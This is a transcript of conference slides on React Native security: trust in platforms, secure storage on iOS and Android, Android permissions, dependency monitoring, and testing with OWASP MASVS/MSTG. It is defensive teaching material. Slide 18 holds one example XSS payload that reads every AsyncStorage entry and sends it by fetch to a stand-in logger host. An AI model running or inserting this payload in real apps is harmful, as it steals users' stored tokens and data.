React Native Security

Transcript

1. Name Surname Sed ut perspiciatis unde omnis iste natus error

   sit voluptatem accusantium doloremque laudantium Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium something.org Julia Potapenko React Native Security Addressing Typical Mistakes Let's shed light on React Native apps’ security and explain some risks and threats developers should address to prevent typical mistakes. @julepka cossacklabs.com

2. Name Surname Sed ut perspiciatis unde omnis iste natus error

   sit voluptatem accusantium doloremque laudantium Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium something.org Julia Potapenko About me 👩💻 Security Software Engineer at Cossack Labs Leader of OWASP Zhytomyr Chapter, Ukraine 🇺🇦 ❤︎ OWASP MASVS/MSTG Project @julepka cossacklabs.com We help companies to protect their sensitive and valuable data.

3. React Native Security. Addressing Typical Mistakes We will talk about

   Architecture Platforms usage Dependencies Security testing

4. React Native Security. Addressing Typical Mistakes “Choosing React Native and

   its components means that you understand and accept potential security consequences.”

5. React Native Security. Addressing Typical Mistakes Architecture basics React Native

   is a cross-platform solution from Facebook that allows writing native apps using React (JavaScript or TypeScript).

6. React Native Security. Addressing Typical Mistakes Trusting third parties Native

   platforms = Apple and Google React Native = Facebook TypeScript = Microsoft

7. React Native Security. Addressing Typical Mistakes Trusting third parties Native

   platforms = Apple and Google React Native = Facebook TypeScript = Microsoft

8. React Native Security. Addressing Typical Mistakes Trusting third parties Native

   platforms = Apple and Google React Native = Facebook TypeScript = Microsoft CVE-2020-1911 CVE-2020-1912 CVE-2020-1913

9. React Native Security. Addressing Typical Mistakes “With React Native, developers

   deal with security for all three platforms: iOS, Android and React Native.”

10. React Native Security. Addressing Typical Mistakes OWASP Mobile Top 10

    #1 Improper Platform Usage

11. React Native Security. Addressing Typical Mistakes React Native is a

    leaky abstraction @vixentael

12. Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data

    stored encrypted Yes Yes React Native Security. Addressing Typical Mistakes

13. Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data

    stored encrypted Yes Yes Data persists across app reinstalls Yes No Hardware-backed encryption Yes Depends on device vendor Data decrypted only before usage Decrypted when device unlocked Yes React Native Security. Addressing Typical Mistakes

14. Managing Android Permissions React Native Security. Addressing Typical Mistakes

15. Managing Android Permissions React Native Security. Addressing Typical Mistakes Android:

    You can add permissions in multiple files + React Native: It is common practice to use third-party solutions

16. Managing Android Permissions React Native Security. Addressing Typical Mistakes Android:

    You can add permissions in multiple files + React Native: It is common practice to use third-party solutions = 💥🤯💥 I don’t need this permission The app crashes if I delete it

17. Is XSS possible? React Native Security. Addressing Typical Mistakes XSS

    possibility is decreases by design.

18. Is XSS possible? React Native Security. Addressing Typical Mistakes XSS

    possibility is decreases by design. XSS is still possible. eval() _reactNative.AsyncStorage.getAllKeys(function(err,result) {_reactNative.AsyncStorage.multiGet(result,function(err,result ) {fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});}); Steal all the data from local storage (AsyncStorage) by exploiting eval- based injection and accessing React Native APIs

19. Jailbreak and Root detection React Native Security. Addressing Typical Mistakes

    It is never easy for regular iOS and Android teams.

20. Jailbreak and Root detection React Native Security. Addressing Typical Mistakes

    It is never easy for regular iOS and Android teams. There are no ready to go React Native solutions: a. implement on your own b. use third-party solutions for each platform and write bridging code

21. Jailbreak and Root detection React Native Security. Addressing Typical Mistakes

    It is never easy for regular iOS and Android teams. There are no ready to go React Native solutions: a. implement on your own b. use third-party solutions for each platform and write bridging code Example: IOSSecuritySuite https://github.com/securing/IOSSecuritySuite Swift ➤ Objective-C ➤ React Native

22. React Native Security. Addressing Typical Mistakes “50 shades of dependencies”

23. A typical situation React Native Security. Addressing Typical Mistakes

24. A typical situation React Native Security. Addressing Typical Mistakes They’ve

    updated dependencies half year later…

25. Monitoring dependencies React Native Security. Addressing Typical Mistakes 🤯 So

    many dependencies Additional CI work One update triggers another update Integrating dependency checkers Updates may be incompatible What if there is no fix for vulnerability? Architectural changes required Tight deadlines

26. What if there is no fix? React Native Security. Addressing

    Typical Mistakes ✅ Learn more about the issue, its scope ✅ Document it, make the team aware ✅ Monitor it and book the time for the update

27. Plan time carefully! React Native Security. Addressing Typical Mistakes ➡

    iOS or Android update ➡ React Native update ➡ Forked version update ➡ Dependencies update ➡ Mobile app source code update

28. React Native Security. Addressing Typical Mistakes Security testing of React

    Native apps

29. React Native Security. Addressing Typical Mistakes OWASP MASVS Mobile Application

    Security Verification Standard https://github.com/OWASP/owasp-masvs Mobile Security Testing Guide https://github.com/OWASP/owasp-mstg OWASP MSTG

30. React Native Security. Addressing Typical Mistakes OWASP MASVS Mobile Application

    Security Verification Standard https://github.com/OWASP/owasp-masvs Mobile Security Testing Guide https://github.com/OWASP/owasp-mstg OWASP MSTG “Please note that the MSTG focuses primarily on native apps. These are apps built with Java or Kotlin using the Android SDK for Android or built with Swift or Objective-C using the Apple SDKs for iOS. Apps using frameworks such as Nativescript, React- native, Xamarin, Cordova, etc. are not within the main focus of the MSTG. However, some essential controls, such as certificate pinning, have been explained already for some of these platforms.”

31. You can still use MASVS! React Native Security. Addressing Typical

    Mistakes OWASP MASVS is language agnostic. All requirements are relevant for React Native apps because they are “native” under the hood.

32. React Native Security. Addressing Typical Mistakes General ideas will be

    similar. You either look for similar JavaScript implementation or native code with bridging functions. You can still use MSTG!

33. How do we test RN app security? React Native Security.

    Addressing Typical Mistakes 1. Use MASVS requirements. 2. Review JavaScript dependencies’ source code to understand native controls behind it. You need to be able to read all the languages: JavaScript (TypeScript), Objective-C (Swift), Java (Kotlin). 3. Use ASVS and WSTG to cover JavaScript-specific vulnerabilities like XSS.

34. Final thoughts… React Native Security. Addressing Typical Mistakes “Learn once,

    write anywhere.”

35. Final thoughts… React Native Security. Addressing Typical Mistakes “Learn once,

    write anywhere.” “Learn once, ask mobile security people for help.”

36. Where to go next? React Native Security. Addressing Typical Mistakes

    My React Native Security Article https://www.cossacklabs.com/blog/react-native-app-security.html React Native Security Guide https://reactnative.dev/docs/security OWASP MASVS Hybrid Apps discussion https://github.com/OWASP/owasp-masvs/discussions/557

37. Thank you! @julepka